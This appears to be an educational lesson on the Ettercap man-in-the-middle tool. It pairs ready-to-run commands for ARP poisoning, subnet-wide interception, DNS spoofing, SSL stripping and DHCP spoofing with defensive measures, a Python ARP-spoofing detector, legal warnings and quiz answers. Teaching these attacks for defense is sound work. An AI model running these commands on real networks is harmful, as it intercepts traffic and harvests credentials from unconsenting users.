Ettercap
Comprehensive Suite for Man-in-the-Middle Attacks
CRITICAL WARNING: Ettercap is for authorized security testing only. Unauthorized use violates computer crime laws. Only use on networks you own or have explicit written permission to test. These techniques can cause network disruption and data interception.
What is Ettercap?
Multi-Platform Network Security Tool
Ettercap is a comprehensive suite for man-in-the-middle attacks on LANs. It provides:
- Active Sniffing: Intercept traffic on switched networks
- Protocol Analysis: Support for many protocols and real-time decoding
- Password Collection: Automatic credential harvesting
- Content Filtering: On-the-fly packet manipulation
- Plugin Architecture: Extensible attack framework
Key Capabilities
Protocol Support:
HTTP, HTTPS, SSH, FTP, POP, IMAP, SMB, LDAP, MySQL, PostgreSQL
Attack Vectors:
ARP poisoning, DNS spoofing, DHCP spoofing, Port stealing, SSL stripping
Password Collection:
Automatic extraction of usernames and passwords from protocols
Educational Purpose:
This lesson is for understanding attack vectors to better defend against them. Always obtain proper authorization before testing.
Common Attack Scenarios
Man-in-the-Middle Attack
Risk level: High
ettercap -T -M arp:remote -i eth0 /192.168.1.1// /192.168.1.100//
Position between gateway and target to intercept traffic
Network-wide ARP Poisoning
Risk level: Critical
ettercap -T -M arp:remote -i eth0 /192.168.1.0/24//
Poison entire subnet to intercept all traffic
DNS Hijacking Attack
Risk level: High
ettercap -T -M arp:remote -P dns_spoof -i eth0 /192.168.1.1// //
Redirect DNS queries to controlled servers
HTTPS Downgrade Attack
Risk level: High
ettercap -T -M arp:remote -P sslstrip -i eth0 /192.168.1.1// //
Strip SSL/TLS encryption from web traffic
Essential Ettercap Commands
Command | Description | Risk Level | Use Case |
---|---|---|---|
ettercap -I | List available network interfaces | Safe | Interface discovery |
ettercap -T -P list | List all available plugins | Safe | Plugin discovery |
ettercap -T -i eth0 | Passive sniffing on interface | Medium | Network monitoring |
ettercap -T -M arp:remote /target1// /target2// | ARP poisoning between two targets | High | MITM attack |
ettercap -T -M dhcp:192.168.1.1/24/192.168.1.1 | DHCP spoofing attack | Critical | Network takeover |
ettercap -T -P dns_spoof -M arp:remote // | DNS spoofing with ARP poisoning | High | DNS hijacking |
Ettercap Plugin System
Ettercap's plugin architecture allows for extensible attack capabilities. Here are some key plugins:
Attack Plugins
- dns_spoof (Attack): DNS spoofing attacks
- sslstrip (Attack): SSL/TLS stripping
- dos_attack (Attack): Denial of service attacks
- fraggle_attack (Attack): UDP fraggle attack
Analysis & Discovery
- autoadd (Discovery): Automatically add new hosts
- chk_poison (Analysis): Check ARP poisoning effectiveness
- finger (Discovery): OS fingerprinting
- gre_relay (Tunneling): GRE tunnel relay
Using Plugins:
ettercap -T -P plugin_name -M attack_mode /target1// /target2//
Defensive Measures Against MITM Attacks
Understanding Ettercap attacks helps implement proper defenses:
Defensive Measure | Description | Effectiveness | Implementation |
---|---|---|---|
Static ARP Tables | Configure static ARP entries to prevent ARP poisoning | High | Network Configuration |
ARP Monitoring | Monitor for suspicious ARP traffic and MAC address changes | High | Network Monitoring |
Network Segmentation | Isolate critical systems using VLANs and subnets | Medium | Network Architecture |
Switch Port Security | Enable port security features on managed switches | High | Switch Configuration |
HTTPS Enforcement | Use HSTS and certificate pinning to prevent SSL stripping | High | Web Security |
DNS Security | Implement DNS over HTTPS (DoH) or DNS over TLS (DoT) | High | DNS Configuration |
Layered Defense Strategy:
- Network Level: Switch security features, VLANs, network segmentation
- Protocol Level: TLS/SSL enforcement, certificate validation, DNSSEC
- Application Level: HSTS, certificate pinning, secure authentication
- Monitoring Level: Network anomaly detection, ARP table monitoring
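One way to implement the ARP Monitoring row above, as an added example that is not part of Ettercap or of this lesson: a small Python detector that reads constructed tcpdump-style ARP reply lines, tracks IP-to-MAC bindings (optionally seeded from a static ARP baseline) and alerts on the two patterns ARP poisoning leaves on the wire, a binding that changes and one MAC answering for several IPs. The log format, the sample lines and the `detect_arp_spoofing` function are assumptions of this example.

```python
"""ARP-reply monitor over tcpdump-style lines (added example, not Ettercap code).

Implements the "ARP Monitoring" defense: track IP-to-MAC bindings and alert
when a binding changes or one MAC claims several IPs, the pattern arp:remote
poisoning leaves on the wire. Input format assumed: `tcpdump -e -n arp`.
"""
import re
from collections import defaultdict

# Constructed sample traffic: the gateway 192.168.1.1 really is aa:..:01, the
# victim 192.168.1.100 is bb:..:64, then cc:..:07 claims both addresses.
SAMPLE_LOG = """\
12:00:01.000 aa:aa:aa:aa:aa:01 > bb:bb:bb:bb:bb:64, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 28
12:00:01.500 bb:bb:bb:bb:bb:64 > aa:aa:aa:aa:aa:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.100 is-at bb:bb:bb:bb:bb:64, length 28
12:00:05.000 cc:cc:cc:cc:cc:07 > bb:bb:bb:bb:bb:64, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at cc:cc:cc:cc:cc:07, length 28
12:00:05.010 cc:cc:cc:cc:cc:07 > aa:aa:aa:aa:aa:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.100 is-at cc:cc:cc:cc:cc:07, length 28
"""

REPLY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[0-9a-f:]{17}) > \S+, ethertype ARP .*?"
    r"Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]{17})"
)


def detect_arp_spoofing(log_text, static_table=None):
    """Return a list of alert strings for suspicious ARP replies.

    static_table is an optional known-good {ip: mac} baseline (the "Static
    ARP Tables" defense); without it the first binding seen is trusted.
    """
    bindings = dict(static_table or {})   # ip -> trusted mac
    claims = defaultdict(set)             # mac -> ips it has announced
    alerts = []
    for line in log_text.splitlines():
        m = REPLY_RE.match(line)
        if not m:
            continue                       # requests and non-ARP lines are ignored
        ts, src, ip, mac = m.group("ts", "src", "ip", "mac")
        if src != mac:                     # Ethernet sender vs ARP payload sender
            alerts.append(f"{ts} header/payload MAC mismatch for {ip}: {src} vs {mac}")
        claims[mac].add(ip)
        if ip in bindings and bindings[ip] != mac:
            alerts.append(f"{ts} {ip} changed from {bindings[ip]} to {mac}")
        else:
            bindings.setdefault(ip, mac)   # learn a new, unchallenged binding
        if len(claims[mac]) > 1:           # one NIC answering for gateway and victim
            alerts.append(f"{ts} {mac} claims multiple IPs: {sorted(claims[mac])}")
    return alerts
```

Feeding it live `tcpdump -e -n arp` output on a monitoring port would flag the poisoning commands shown earlier within their first reply; a trusted baseline is what turns the first change into an alert rather than a silently learned binding.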
Legal and Ethical Considerations
⚖️ Legal Requirements
- Written Authorization: Always obtain explicit written permission
- Scope Definition: Clearly define what systems are in scope
- Data Protection: Follow privacy laws (GDPR, HIPAA, etc.)
- Incident Response: Have procedures for accidental data exposure
- Documentation: Maintain detailed logs of all testing activities
Criminal Penalties
Unauthorized network interception can result in:
- Federal computer crime charges
- Wiretapping and eavesdropping violations
- Civil liability for damages
- Professional license revocation
🛡️ Ethical Guidelines
- Principle of Least Harm: Minimize network disruption
- Data Minimization: Collect only necessary information
- Confidentiality: Protect all captured sensitive data
- Transparency: Report findings responsibly
- Education Focus: Use knowledge to improve security
Legitimate Use Cases
- Penetration Testing: Authorized security assessments
- Red Team Exercises: Simulated attack scenarios
- Network Forensics: Incident response and investigation
- Security Research: Academic and professional research
- Defense Training: Understanding attack methods
Knowledge Check
Answer: Unified sniffing (-T) operates on a single network segment and is suitable for most scenarios including switched networks. Bridged sniffing (-B) requires two network interfaces and acts as a transparent bridge between network segments, useful for intercepting traffic between different network segments.
Answer: ARP poisoning works by sending fake ARP responses that associate the attacker's MAC address with the IP address of the gateway or target host. This causes victims to send their traffic to the attacker instead of the legitimate destination, allowing interception and analysis of the traffic before forwarding it to the real destination.
Answer: Key defenses include: (1) Static ARP tables to prevent ARP poisoning, (2) Switch port security features, (3) Network segmentation with VLANs, (4) ARP monitoring and anomaly detection, (5) HTTPS enforcement with HSTS, (6) Certificate pinning to prevent SSL stripping, and (7) DNS over HTTPS/TLS to prevent DNS spoofing.